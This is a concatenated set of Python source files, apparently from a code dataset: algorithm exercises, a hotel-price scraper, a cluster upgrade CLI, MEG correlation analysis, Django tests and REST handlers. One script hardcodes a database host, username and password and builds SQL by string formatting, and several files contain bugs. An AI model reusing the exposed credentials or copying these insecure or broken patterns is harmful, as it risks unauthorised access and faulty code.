people 所表示的队列。返回的队列应该格式化为数组 queue ,\n# 其中 queue[j] = [hj, kj] 是队列中第 j 个人的属性(queue[0] 是排在队列前面的人)。\n#\n\n# h升序,k降序,则k代表当前剩余位置中的索引\npeople = [[7,0],[4,4],[7,1],[5,0],[6,1],[5,2]]\n\ndef reconstructQueue(people):\n res = [[0, 0]] * len(people)\n index = list(range(len(people)))\n people = sorted(people, key = lambda item: (item[0], -item[1]))\n for p in people:\n idx = index[p[1]]\n res[idx] = p\n index.pop(p[1])\n return res\n\n\"\"\"\n# 二刷,h降序,k升序。由于在遍历每一个p时,所有身高比其高的都已经被确定位置,所以其索引就是k(后面没有可能出现比他高的)\nclass Solution:\n def reconstructQueue(self, people: List[List[int]]) -> List[List[int]]:\n people = sorted(people, key = lambda item: [-item[0], item[1]])\n ret = []\n for p in people:\n ret.insert(p[1], p)\n return ret\n\"\"\"\nprint(reconstructQueue(people))","repo_name":"vandeppce/algorithm","sub_path":"9.greedy/406*ReconstructQueue.py","file_name":"406*ReconstructQueue.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33977480087","text":"# # PR 3 DESEMBER 2019\r\n# kata = input('silahkan ketik sebuah kalimat: ')\r\n# def jumlah_kata(kata):\r\n# my_string = kata.lower().split()\r\n# my_dict = {}\r\n# for item in my_string:\r\n# if item in my_dict:\r\n# my_dict[item] += 1\r\n# else:\r\n# my_dict[item] = 1\r\n# print(my_dict)\r\n# for key, val in my_dict.items():\r\n# print(\"Jumlah kata '{}' ada sebanyak {}\".format (key.title(), val))\r\n\r\n# jumlah_kata(kata)\r\n\r\n# # PR BONUS 3 DESEMBER 2019\r\nimport sys\r\nimport random\r\nmy_list = []\r\nn = int(input('Masukkan ukuran:'))\r\n\r\ndef list_angka(my_list):\r\n num = 1\r\n for row in range(n):\r\n my_list=[]\r\n for col in range(n):\r\n my_list.append(num)\r\n print(num,end=\" \")\r\n num += 1\r\n print()\r\n\r\n# # Function to rotate the matrix\r\ndef rotateright(my_list):\r\n for c in range(3):\r\n list_kanan = []\r\n for i in range(len(my_list)):\r\n list_temp = []\r\n for j in range((my_list(n)-1),-1,-1):\r\n list_temp.append(my_list[j][i])\r\n list_kanan.append(list_temp)\r\n my_list = list_kanan\r\n \r\ndef menu(my_list):\r\n print('Pilih'+'\\n'+'1. Angka Urut'+'\\n'+'2. Angka Random')\r\n pilihan = int(input('Masukkan pilihan: '))\r\n if pilihan == 1:\r\n list_angka(my_list)\r\n pilihan_kika = input('Putar ke arah? ')\r\n if pilihan_kika == 'kanan':\r\n pilih3 = int(input('berapa kali?: '))\r\n if pilih3 >= 1:\r\n rotateright(my_list)\r\n if pilihan_kika == 'kiri':\r\n pilih3 = int(input('berapa kali?: '))\r\n if pilih3 >= 1:\r\n print('Kondisi belum dibuat')\r\n pilih4 = input('apakah anda ingin melanjutkan?(Y / N): ')\r\n if pilih4 == \"Y\":\r\n menu(my_list)\r\n if pilih4 == \"N\":\r\n sys.exit\r\nmenu(my_list)","repo_name":"catinugraha/Python_Fundamental","sub_path":"PR_intro4.py","file_name":"PR_intro4.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7033151586","text":"# -*- coding: UTF-8 -*- \n#!/usr/bin/python\n\nimport MySQLdb\nimport json\nimport urllib\n\n# Open database connection\ndb = MySQLdb.connect(\"140.138.77.104\",\"BDSTeam08\",\"BDSTeam08@2015\",\"BDSTeam08_DB\" )\n\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\n\n\nsql = \"INSERT INTO pet_1001514(pet_name, \\\n pet_owner, pet_specise, pet_sex, pet_birth) \\\n VALUES ('%s', '%s', '%s', '%s', '%s' )\" % \\\n ( Mac , Mac1 , Mac2 , Mac3 , '0000-00-00' ) \ntry : \n #執行sql語句\n cursor . execute ( sql ) \n #提交到數據庫執行\n db . 
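# A safer, runnable shape for the INSERT above (hypothetical values; lets
# MySQLdb bind the parameters instead of building SQL with %-formatting,
# which also fixes the undefined Mac/Mac1/... names):
#
#   sql = ("INSERT INTO pet_1001514 (pet_name, pet_owner, pet_specise, "
#          "pet_sex, pet_birth) VALUES (%s, %s, %s, %s, %s)")
#   cursor.execute(sql, ("Mac", "Mac1", "Mac2", "Mac3", "0000-00-00"))
#   db.commit()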
commit () \nexcept : \n #發生錯誤時回滾\n db . rollback ()\n\n#關閉數據庫連接\ndb . close ()\n\n# execute SQL query using execute() method.\n# cursor.execute(\"SELECT VERSION()\")\n\n# # Fetch a single row using fetchone() method.\n# data = cursor.fetchone()\n\n# print \"Database version : %s \" % data\n\n# # disconnect from serve\n\n# sql = \"\"\"INSERT INTO EMPLOYEE(FIRST_NAME,\n# LAST_NAME, AGE, SEX, INCOME)\n# VALUES ('Mac', 'Mohan', 20, 'M', 2000)\"\"\"\n\n\n# sql = \"INSERT INTO EMPLOYEE(FIRST_NAME, \\\n# LAST_NAME, AGE, SEX, INCOME) \\\n# VALUES ('%s', '%s', '%d', '%c', '%d' )\" % \\\n# ( 'Mac' , 'Mohan' , 20 , 'M' , 2000 ) \n\n\n# db.close()","repo_name":"fifiteen82726/python_craw","sub_path":"inseart_data_to_DB.py","file_name":"inseart_data_to_DB.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2413862125","text":"\"\"\"\n.. module:: bidr.apps.organizations.test_forms\n :synopsis: Bidr Silent Auction System Organization Form Tests.\n\n.. moduleauthor:: Alex Kavanaugh \n\n\"\"\"\n\nfrom django.contrib.auth import get_user_model\nfrom django.test.client import RequestFactory\nfrom django.test.testcases import TestCase\n\nfrom .forms import OrganizationCreateForm\n\n\nclass TestOrganizationCreateForm(TestCase):\n\n def setUp(self):\n self.request = RequestFactory()\n self.request.user = get_user_model().objects.create_user(\n \"The Dude\", \"thedudeabides@dudeism.com\", \"+13107824229\", \"!\"\n )\n\n def test_form_valid_all_fields(self):\n data = {\n \"name\": \"test_name\", \"owner\": self.request.user.id, \"email\": \"test@email.com\",\n \"phone_number\": \"+18056413215\", \"website\": \"http://test.com\"\n }\n form = OrganizationCreateForm(request=self.request, data=data)\n self.assertTrue(form.is_valid())\n\n def test_form_valid_mandatory_fields_with_fake_user(self):\n data = {\"name\": \"test_name\", \"owner\": self.request.user.id}\n form = OrganizationCreateForm(request=self.request, data=data)\n self.assertTrue(form.is_valid())\n\n def test_form_invalid_missing_name(self):\n data = {\n \"email\": \"test@email.com\", \"owner\": self.request.user.id,\n \"phone_number\": \"+18056413215\", \"website\": \"http://test.com\"\n }\n form = OrganizationCreateForm(request=self.request, data=data)\n self.assertFalse(form.is_valid())\n self.assertEqual(1, len(form.errors))\n self.assertIn(\"name\", form.errors)\n\n def test_form_valid_no_website_protocol(self):\n data = {\n \"name\": \"test_name\", \"email\": \"test@email.com\", \"owner\": self.request.user.id,\n \"phone_number\": \"+18056413215\", \"website\": \"test.com\"\n }\n form = OrganizationCreateForm(request=self.request, data=data)\n self.assertTrue(form.is_valid())\n","repo_name":"kavdev/bidr_project","sub_path":"bidr/apps/organizations/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33819910714","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nfrom currency_converter import CurrencyConverter\r\nfrom datetime import date\r\nimport re\r\n\r\n\r\n\r\ndef ebookers_hotel(hotelname,destinationHotel,checkInDate,checkOutDate,rooms,adults,children):\r\n childstr='0'\r\n if int(children)>0:\r\n childstr = '1_10'\r\n if int(children)>1:\r\n for i in range(int(children)-1):\r\n childstr = childstr+',1_10'\r\n\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 
10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15\",\r\n \"Accept-Language\": \"en-gb \",\r\n \"Accept-Encoding\" : \"br, gzip, deflate\",\r\n \"Accept\" : \"test/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Referer\" : \"http://www.google.com/\",\r\n }\r\n url=\"https://www.ebookers.com/Hotel-Search?destination=\"+'+'.join(destinationHotel.split(' '))+\"&hotelName=\"+'+'.join(destinationHotel.split(' '))+\"&startDate=\"+checkInDate+\\\r\n \"&endDate=\"+checkOutDate+\"&d1=\"+checkInDate+\"&d2=\"+checkOutDate+\"&rooms=\"+rooms+\"&adults=\"+adults+\"&children=\"+childstr\r\n\r\n response=requests.get(url,headers=headers)\r\n soup=BeautifulSoup(response.content,'html.parser')\r\n containers = soup.find_all(class_=\"uitk-card-content uitk-grid uitk-cell all-y-padding-three all-x-padding-three listing-content\")\r\n sitehotelname=None\r\n price=None\r\n for container in containers:\r\n if re.sub(r'[^\\w]', '',container.find(\"h3\",{\"data-stid\":\"content-hotel-title\"}).text.lower())==re.sub(r'[^\\w]', '',hotelname.lower()):\r\n targethotel=container\r\n sitehotelname=targethotel.find(\"h3\",{\"data-stid\":\"content-hotel-title\"}).text.lower()\r\n price=targethotel.find(\"span\",{\"data-stid\":\"content-hotel-lead-price\"}).text if targethotel.find(\"span\",{\"data-stid\":\"content-hotel-lead-price\"}) is not None else None\r\n extramessages = targethotel.find(\"div\", {\"data-stid\": \"supporting-messages-0\"}).text if targethotel.find(\"div\", {\"data-stid\": \"supporting-messages-0\"}) is not None else 'No Message'\r\n\r\n #Mporo na parw kai asteria kai bathmologia pelaton\r\n finalprice=None\r\n conv=CurrencyConverter()\r\n\r\n checkin_split=[int(x) for x in checkInDate.split('-')]\r\n checkout_split=[int(x) for x in checkOutDate.split('-')]\r\n st_date=date(checkin_split[0],checkin_split[1],checkin_split[2])\r\n end_date=date(checkout_split[0],checkout_split[1],checkout_split[2])\r\n delta=end_date-st_date\r\n\r\n if sitehotelname and price:\r\n price=price.replace('£','')\r\n price=price.replace(',','')\r\n finalprice=str(conv.convert(int(price)/delta.days,'GBP','EUR'))\r\n elif price=='':\r\n finalprice='Sold Out'\r\n else:\r\n finalprice='Not Found'\r\n return finalprice","repo_name":"farinisgeorge/Pricelytical","sub_path":"Pricelytical_Scraper/Server/ebookers/ebookers_main.py","file_name":"ebookers_main.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13245773895","text":"# encoding: utf-8\nfrom __future__ import unicode_literals\n\nimport argparse\nimport os\n\nfrom .ansible import AnsibleBastionHost\nfrom .cmd import run_ansible_playbook\nfrom .utils import get_major_version\nfrom .cluster import construct_cluster\n\n\nUPGRADE_MSG = \"\"\"\n┌───────────────────────────────────────────────────────────────────────────────┐\n│ │\n│ The system has been upgraded to the latest version. 
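# A condensed sketch of the per-night price normalisation performed above:
# strip the GBP formatting, divide the stay total by the number of nights,
# then convert with CurrencyConverter (which bundles ECB reference rates).
# The dates and price here are hypothetical.
#
#   from datetime import date
#   from currency_converter import CurrencyConverter
#   nights = (date(2024, 7, 5) - date(2024, 7, 1)).days      # 4
#   total_gbp = int("£1,200".replace("£", "").replace(",", ""))
#   per_night_eur = CurrencyConverter().convert(total_gbp / nights, "GBP", "EUR")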
│\n│ │\n└───────────────────────────────────────────────────────────────────────────────┘\n\n\"\"\"\n\n\n\ndef add_command(subparsers):\n parser = subparsers.add_parser(\n \"upgrade\", help=\"upgrade onecloud cluster to specified version\")\n #parser.add_argument('config', help=\"config file\")\n # requirement options\n parser.add_argument(\"primary_master_host\",\n metavar=\"FIRST_MASTER_HOST\",\n help=\"onecloud cluster primary master host, \\\n e.g., 10.1.2.56\")\n parser.add_argument(\"version\",\n metavar=\"VERSION\",\n help=\"onecloud version to be upgrade, \\\n e.g., v3.6.9\")\n\n # optional options\n help_d = lambda help: help + \" (default: %(default)s)\"\n\n parser.add_argument(\"--user\", \"-u\",\n dest=\"ssh_user\",\n default=\"root\",\n help=help_d(\"primary master host ssh user\"))\n\n parser.add_argument(\"--key-file\", \"-k\",\n dest=\"ssh_private_file\",\n default=os.path.expanduser(\"~/.ssh/id_rsa\"),\n help=help_d(\"primary master ssh private key file\"))\n\n parser.add_argument(\"--port\", \"-p\",\n dest=\"ssh_port\",\n type=int,\n default=\"22\",\n help=help_d(\"primary master host ssh port\"))\n\n parser.add_argument(\"--as-bastion\", \"-B\",\n dest=\"primary_as_bastion\",\n action=\"store_true\",\n help=\"use primary master node as ssh bastion host to run ansible\")\n\n parser.set_defaults(func=do_upgrade)\n\n\ndef do_upgrade(args):\n cluster = construct_cluster(\n args.primary_master_host,\n args.ssh_user,\n args.ssh_private_file,\n args.ssh_port)\n cur_ver = cluster.get_current_version()\n\n config = UpgradeConfig(cur_ver, args.version)\n\n bastion_host = None\n if args.primary_as_bastion:\n bastion_host = AnsibleBastionHost(args.primary_master_host)\n\n inventory_content = cluster.generate_playbook_inventory(bastion_host)\n inventory_f = '/tmp/test-hosts.ini'\n with open(inventory_f, 'w') as f:\n f.write(inventory_content)\n # start run upgrade playbook\n return_code = run_ansible_playbook(\n inventory_f,\n './onecloud/upgrade-cluster.yml',\n vars=config.to_ansible_vars(),\n )\n if return_code is not None and return_code != 0:\n return return_code\n cluster.set_current_version(args.version)\n print(UPGRADE_MSG.encode('utf-8'))\n\n\nclass UpgradeConfig(object):\n\n def __init__(self, cur_ver, upgrade_ver):\n self.current_onecloud_version = cur_ver\n self.current_onecloud_major_version = get_major_version(cur_ver)\n self.upgrade_onecloud_version = upgrade_ver\n self.upgrade_onecloud_major_version = get_major_version(upgrade_ver)\n\n def is_major_upgrade(self):\n return self.current_onecloud_major_version != self.upgrade_onecloud_major_version\n\n def get_yunion_yum_repo(self):\n ver = self.upgrade_onecloud_major_version.replace('_', '.')\n ver = ver[1:]\n return \"https://iso.yunion.cn/yumrepo-%s/yunion.repo\" % (ver)\n\n def to_ansible_vars(self):\n return {\n \"current_onecloud_version\": self.current_onecloud_version,\n \"current_onecloud_major_version\": self.current_onecloud_major_version,\n \"upgrade_onecloud_version\": self.upgrade_onecloud_version,\n \"upgrade_onecloud_major_version\": self.upgrade_onecloud_major_version,\n \"is_major_upgrade\": self.is_major_upgrade(),\n \"yunion_yum_repo\": self.get_yunion_yum_repo(),\n }\n","repo_name":"robert871126/ocboot","sub_path":"lib/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"38632503528","text":"import sys\n\nimport mne\nimport numpy as np\nfrom nitime import TimeSeries\nfrom 
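# Worked example of the URL built in get_yunion_yum_repo() below, assuming
# get_major_version("v3.6.9") yields "v3_6" (the '_' -> '.' replacement and
# the leading-"v" strip in that method suggest this shape):
#
#   cfg = UpgradeConfig("v3.6.8", "v3.6.9")
#   cfg.get_yunion_yum_repo()  # -> "https://iso.yunion.cn/yumrepo-3.6/yunion.repo"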
nitime.analysis import CorrelationAnalyzer\nfrom scipy.io import loadmat\n\nfrom my_settings import (source_folder)\n\nsubject = sys.argv[1]\n\ntimes = np.arange(-4000, 1001, 1)\ntimes = times / 1000.\n\nht_cls = loadmat(source_folder +\n \"ave_ts/mat_files/%s_classic_ts_DKT_snr-3_orth-epo.mat\" %\n subject)[\"data_org\"]\nht_pln = loadmat(source_folder +\n \"ave_ts/mat_files/%s_plan_ts_DKT_snr-3_orth-epo.mat\" %\n subject)[\"data_org\"]\nht_int = loadmat(source_folder +\n \"ave_ts/mat_files/%s_interupt_ts_DKT_snr-3_orth-epo.mat\" %\n subject)[\"data_org\"]\n\nresults_cls = {}\nresults_pln = {}\nresults_int = {}\n\ntois = {\n \"pln\": [1250, 1750],\n \"pre-press\": [3500, 4000],\n \"post-press\": [4001, 4500]\n}\n\nfor toi in tois.keys():\n corr_cls = []\n corr_pln = []\n corr_int = []\n\n ht_cls_bs = mne.baseline.rescale(\n ht_cls,\n times,\n baseline=(-3.8, -3.3),\n mode=\"mean\")\n\n ht_pln_bs = mne.baseline.rescale(\n ht_pln,\n times,\n baseline=(-3.8, -3.3),\n mode=\"mean\")\n ht_int_bs = mne.baseline.rescale(\n ht_pln,\n times,\n baseline=(-3.8, -3.3),\n mode=\"mean\")\n\n for ts in ht_cls_bs:\n nits = TimeSeries(\n ts[:, tois[toi][0]:tois[toi][1]],\n sampling_rate=1000) # epochs_normal.info[\"sfreq\"])\n\n corr_cls += [CorrelationAnalyzer(nits)]\n\n for ts in ht_pln_bs:\n nits = TimeSeries(\n ts[:, tois[toi][0]:tois[toi][1]],\n sampling_rate=1000) # epochs_normal.info[\"sfreq\"])\n\n corr_pln += [CorrelationAnalyzer(nits)]\n\n for ts in ht_int_bs:\n nits = TimeSeries(\n ts[:, tois[toi][0]:tois[toi][1]],\n sampling_rate=1000) # epochs_normal.info[\"sfreq\"])\n\n corr_int += [CorrelationAnalyzer(nits)]\n\n results_cls = np.asarray([c.corrcoef for c in corr_cls])\n results_pln = np.asarray([c.corrcoef for c in corr_pln])\n results_int = np.asarray([c.corrcoef for c in corr_int])\n\n np.save(source_folder + \"graph_data/%s_classic_corr_%s_orth.npy\" %\n (subject, toi), results_cls)\n np.save(source_folder + \"graph_data/%s_plan_corr_%s_orth.npy\" %\n (subject, toi), results_pln)\n np.save(source_folder + \"graph_data/%s_interupt_corr_%s_orth.npy\" %\n (subject, toi), results_int)\n","repo_name":"MadsJensen/RP_scripts","sub_path":"create_network_matrice_orth.py","file_name":"create_network_matrice_orth.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33461304022","text":"\"\"\"Handle HTTP methods for server.\"\"\"\nimport json\nfrom collections.abc import AsyncIterator, Iterator\nfrom math import ceil\nfrom typing import Any, Optional\n\nimport aiohttp_session\nimport ujson\nfrom aiohttp import web\nfrom aiohttp.web import Request, Response\nfrom multidict import CIMultiDict\n\nfrom metadata_backend.message_broker.mq_service import MQPublisher\n\nfrom ...conf.conf import WORKFLOWS, schema_types\nfrom ...helpers.logger import LOG\nfrom ...helpers.schema_loader import JSONSchemaLoader, SchemaNotFoundException\nfrom ...helpers.workflow import Workflow\nfrom ...services.datacite_service_handler import DataciteServiceHandler\nfrom ...services.metax_service_handler import MetaxServiceHandler\nfrom ...services.rems_service_handler import RemsServiceHandler\nfrom ..operators.object import ObjectOperator\nfrom ..operators.submission import SubmissionOperator\nfrom ..operators.user import UserOperator\n\n\nclass RESTAPIHandler:\n \"\"\"Handler for REST API methods.\"\"\"\n\n def _check_schema_exists(self, schema_type: str) -> None:\n \"\"\"Check if schema type exists.\n\n :param schema_type: 
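# A toy end-to-end check of the correlation step above: two sources of
# white noise give a (2, 2) correlation matrix with a unit diagonal.
#
#   import numpy as np
#   from nitime import TimeSeries
#   from nitime.analysis import CorrelationAnalyzer
#   ts = TimeSeries(np.random.randn(2, 500), sampling_rate=1000)
#   C = CorrelationAnalyzer(ts).corrcoef
#   assert C.shape == (2, 2) and np.allclose(np.diag(C), 1.0)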
schema type.\n :raises: HTTPNotFound if schema does not exist.\n \"\"\"\n if schema_type not in set(schema_types.keys()):\n reason = f\"Specified schema {schema_type} was not found.\"\n LOG.error(reason)\n raise web.HTTPNotFound(reason=reason)\n\n def _get_page_param(self, req: Request, name: str, default: int) -> int:\n \"\"\"Handle page parameter value extracting.\n\n :param req: GET Request\n :param param_name: Name of the parameter\n :param default: Default value in case parameter not specified in request\n :returns: Page parameter value\n \"\"\"\n try:\n param = int(req.query.get(name, str(default)))\n except ValueError as exc:\n reason = f\"{name} parameter must be a number, now it is {req.query.get(name)}\"\n LOG.exception(reason)\n raise web.HTTPBadRequest(reason=reason) from exc\n if param < 1:\n reason = f\"{name} parameter must be over 0\"\n LOG.error(reason)\n raise web.HTTPBadRequest(reason=reason)\n return param\n\n def _get_param(self, req: Request, name: str) -> str:\n \"\"\"Extract mandatory query parameter from URL.\n\n :param req: GET Request\n :param name: name of query param to get\n :returns: project ID parameter value\n \"\"\"\n param = req.query.get(name, \"\")\n if param == \"\":\n reason = f\"mandatory query parameter {name} is not set\"\n LOG.error(reason)\n raise web.HTTPBadRequest(reason=reason)\n return param\n\n async def _handle_check_ownership(self, req: Request, collection: str, accession_id: str) -> tuple[bool, str]:\n \"\"\"Check if object belongs to project.\n\n For this we need to check the object is in exactly 1 submission and we need to check\n that submission belongs to a project.\n\n :param req: HTTP request\n :param collection: collection or schema of document\n :param doc_id: document accession id\n :raises: HTTPUnauthorized if accession id does not belong to user\n :returns: bool and possible project id\n \"\"\"\n session = await aiohttp_session.get_session(req)\n\n db_client = req.app[\"db_client\"]\n\n current_user = session[\"user_info\"]\n user_op = UserOperator(db_client)\n _check = False\n\n project_id = \"\"\n if collection != \"submission\":\n submission_op = SubmissionOperator(db_client)\n submission_id, _ = await submission_op.check_object_in_submission(collection, accession_id)\n if submission_id:\n # if the draft object is found in submission we just need to check if the submission belongs to user\n _check, project_id = await user_op.check_user_has_doc(req, \"submission\", current_user, submission_id)\n elif collection.startswith(\"template\"):\n # if collection is template but not found in a submission\n # we also check if object is in templates of the user\n # they will be here if they will not be deleted after publish\n _check, project_id = await user_op.check_user_has_doc(req, collection, current_user, accession_id)\n else:\n _check = False\n else:\n _check, project_id = await user_op.check_user_has_doc(req, collection, current_user, accession_id)\n\n if not _check:\n reason = f\"{collection} {accession_id}.\"\n LOG.error(reason)\n raise web.HTTPUnauthorized(reason=reason)\n\n return _check, project_id\n\n async def _get_data(self, req: Request) -> dict[str, Any]:\n \"\"\"Get the data content from a request.\n\n :param req: POST/PUT/PATCH request\n :raises: HTTPBadRequest if request does not have proper JSON data\n :returns: JSON content of the request\n \"\"\"\n try:\n content: dict[str, Any] = await req.json()\n return content\n except json.decoder.JSONDecodeError as e:\n reason = f\"JSON is not correctly formatted, err: 
{e}\"\n LOG.exception(reason)\n raise web.HTTPBadRequest(reason=reason)\n\n @staticmethod\n def _json_response(data: dict[str, Any] | list[dict[str, Any]]) -> Response:\n \"\"\"Reusable json response, serializing data with ujson.\n\n :param data: Data to be serialized and made into HTTP 200 response\n \"\"\"\n return web.Response(\n body=ujson.dumps(data, escape_forward_slashes=False), status=200, content_type=\"application/json\"\n )\n\n async def get_schema_types(self, _: Request) -> Response:\n \"\"\"Get all possible metadata schema types from database.\n\n Basically returns which objects user can submit and query for.\n\n :returns: JSON list of schema types\n \"\"\"\n data = [x[\"description\"] for x in schema_types.values()]\n LOG.info(\"GET schema types. Retrieved %d schemas.\", len(schema_types))\n return self._json_response(data)\n\n async def get_json_schema(self, req: Request) -> Response:\n \"\"\"Get all JSON Schema for a specific schema type.\n\n Basically returns which objects user can submit and query for.\n :param req: GET Request\n :raises: HTTPBadRequest if request does not find the schema\n :returns: JSON list of schema types\n \"\"\"\n schema_type = req.match_info[\"schema\"]\n self._check_schema_exists(schema_type)\n\n try:\n if schema_type == \"datacite\":\n submission = JSONSchemaLoader().get_schema(\"submission\")\n schema = submission[\"properties\"][\"doiInfo\"]\n else:\n schema = JSONSchemaLoader().get_schema(schema_type)\n LOG.info(\"%s JSON schema loaded.\", schema_type)\n return self._json_response(schema)\n\n except SchemaNotFoundException as error:\n reason = f\"{error} Occured for JSON schema: '{schema_type}'.\"\n LOG.exception(reason)\n raise web.HTTPBadRequest(reason=reason)\n\n async def get_workflows(self, _: Request) -> Response:\n \"\"\"Get all JSON workflows.\n\n Workflows tell what are the requirements for different 'types of submissions' (aka workflow)\n\n :returns: JSON list of workflows\n \"\"\"\n LOG.info(\"GET workflows. 
Retrieved %d workflows.\", len(WORKFLOWS))\n response = {workflow.name: workflow.description for workflow in WORKFLOWS.values()}\n return self._json_response(response)\n\n async def get_workflow_request(self, req: Request) -> Response:\n \"\"\"Get a single workflow definition by name.\n\n :param req: GET Request\n :raises: HTTPNotFound if workflow doesn't exist\n :returns: workflow as a JSON object\n \"\"\"\n workflow_name = req.match_info[\"workflow\"]\n LOG.info(\"GET workflow: %r.\", workflow_name)\n workflow = self.get_workflow(workflow_name)\n return self._json_response(workflow.workflow)\n\n def get_workflow(self, workflow_name: str) -> Workflow:\n \"\"\"Get a single workflow definition by name.\n\n :param workflow_name: Name of the workflow\n :raises: HTTPNotFound if workflow doesn't exist\n :returns: Workflow\n \"\"\"\n if workflow_name not in WORKFLOWS:\n reason = f\"Workflow {workflow_name} was not found.\"\n LOG.error(reason)\n raise web.HTTPNotFound(reason=reason)\n return WORKFLOWS[workflow_name]\n\n def _header_links(self, url: str, page: int, size: int, total_objects: int) -> CIMultiDict[str]:\n \"\"\"Create link header for pagination.\n\n :param url: base url for request\n :param page: current page\n :param size: results per page\n :param total_objects: total objects to compute the total pages\n :returns: JSON with query results\n \"\"\"\n total_pages = ceil(total_objects / size)\n prev_link = f'<{url}?page={page-1}&per_page={size}>; rel=\"prev\", ' if page > 1 else \"\"\n next_link = f'<{url}?page={page+1}&per_page={size}>; rel=\"next\", ' if page < total_pages else \"\"\n last_link = f'<{url}?page={total_pages}&per_page={size}>; rel=\"last\"' if page < total_pages else \"\"\n comma = \", \" if 1 < page < total_pages else \"\"\n first_link = f'<{url}?page=1&per_page={size}>; rel=\"first\"{comma}' if page > 1 else \"\"\n links = f\"{prev_link}{next_link}{first_link}{last_link}\"\n link_headers = CIMultiDict(Link=f\"{links}\")\n LOG.debug(\"Link headers created\")\n return link_headers\n\n @staticmethod\n def iter_submission_objects(submission: dict[str, Any]) -> Iterator[tuple[str, str]]:\n \"\"\"Iterate over a submission's objects.\n\n :param submission: Submission data\n\n yields accession_id, schema\n \"\"\"\n for _obj in submission[\"metadataObjects\"]:\n accession_id = _obj[\"accessionId\"]\n schema = _obj[\"schema\"]\n\n yield accession_id, schema\n\n async def iter_submission_objects_data(\n self, submission: dict[str, Any], obj_op: ObjectOperator\n ) -> AsyncIterator[tuple[str, str, dict[str, Any]]]:\n \"\"\"Iterate over a submission's objects and retrieve their data.\n\n :param submission: Submission data\n :param obj_op: Object ObjectOperator\n\n yields accession_id, schema, object_data\n \"\"\"\n for accession_id, schema in self.iter_submission_objects(submission):\n object_data, _ = await obj_op.read_metadata_object(schema, accession_id)\n\n if not isinstance(object_data, dict):\n LOG.error(\"Object with accession ID %r is not a Dict. 
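# Worked example of the Link-header maths in _header_links() above:
# 95 objects at 20 per page gives ceil(95 / 20) = 5 pages, so page 2 links to
#
#   <url?page=1&per_page=20>; rel="prev", <url?page=3&per_page=20>; rel="next",
#   <url?page=1&per_page=20>; rel="first", <url?page=5&per_page=20>; rel="last"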
This might be a bug\", accession_id)\n continue\n\n yield accession_id, schema, object_data\n\n\nclass RESTAPIIntegrationHandler(RESTAPIHandler):\n \"\"\"Endpoints that use service integrations.\"\"\"\n\n def __init__(\n self,\n metax_handler: MetaxServiceHandler,\n datacite_handler: DataciteServiceHandler,\n rems_handler: RemsServiceHandler,\n mq_publisher: Optional[MQPublisher] = None,\n ) -> None:\n \"\"\"Endpoints should have access to metax and datacite services.\"\"\"\n self.metax_handler = metax_handler\n self.datacite_handler = datacite_handler\n self.rems_handler = rems_handler\n if mq_publisher:\n self.mq_publisher = mq_publisher\n\n @staticmethod\n async def get_user_external_id(request: web.Request) -> str:\n \"\"\"Get current user's external id.\n\n :param request: current HTTP request made by the user\n :returns: Current users external ID\n \"\"\"\n session = await aiohttp_session.get_session(request)\n current_user = session[\"user_info\"]\n user_op = UserOperator(request.app[\"db_client\"])\n user = await user_op.read_user(current_user)\n metadata_provider_user: str = user[\"externalId\"]\n return metadata_provider_user\n\n async def create_metax_dataset(\n self, obj_op: ObjectOperator, collection: str, obj: dict[str, Any], external_id: str\n ) -> str:\n \"\"\"Handle connection to Metax api handler for dataset creation.\n\n Dataset or Study object is assigned with DOI\n and it's data is sent to Metax api handler.\n Object database entry is updated with metax ID returned by Metax service.\n\n :param obj_op: Object ObjectOperator\n :param collection: object's schema\n :param obj: metadata object\n :param external_id: user id\n :returns: Metax ID\n \"\"\"\n LOG.info(\"Creating draft dataset to Metax.\")\n new_info = {}\n if \"doi\" in obj:\n new_info[\"doi\"] = obj[\"doi\"]\n metax_id = await self.metax_handler.post_dataset_as_draft(external_id, collection, obj)\n new_info[\"metaxIdentifier\"] = metax_id\n await obj_op.update_identifiers(collection, obj[\"accessionId\"], new_info)\n\n return metax_id\n\n async def create_draft_doi(self, collection: str) -> str:\n \"\"\"Create draft DOI for study and dataset.\n\n The Draft DOI will be created only on POST and the data added to the\n submission. 
Any update of this should not be possible.\n\n :param collection: either study or dataset\n :returns: Dict with DOI of the study or dataset as well as the types.\n \"\"\"\n _doi_data = await self.datacite_handler.create_draft(prefix=collection)\n\n LOG.debug(\"DOI created with identifier: %r\", _doi_data[\"fullDOI\"])\n doi: str = _doi_data[\"fullDOI\"]\n\n return doi\n\n async def check_rems_ok(self, submission: dict[str, Any]) -> bool:\n \"\"\"Check that REMS DAC in object is ok.\"\"\"\n if \"rems\" not in submission:\n raise web.HTTPBadRequest(reason=\"REMS field is missing.\")\n\n dac = submission[\"rems\"]\n\n if \"workflowId\" in dac and \"organizationId\" in dac and \"licenses\" in dac:\n await self.rems_handler.validate_workflow_licenses(\n dac[\"organizationId\"], dac[\"workflowId\"], dac[\"licenses\"]\n )\n else:\n raise web.HTTPBadRequest(\n reason=\"REMS DAC is missing one or more of the required fields: \"\n \"'workflowId', 'organizationId', or 'licenses'.\"\n )\n\n return 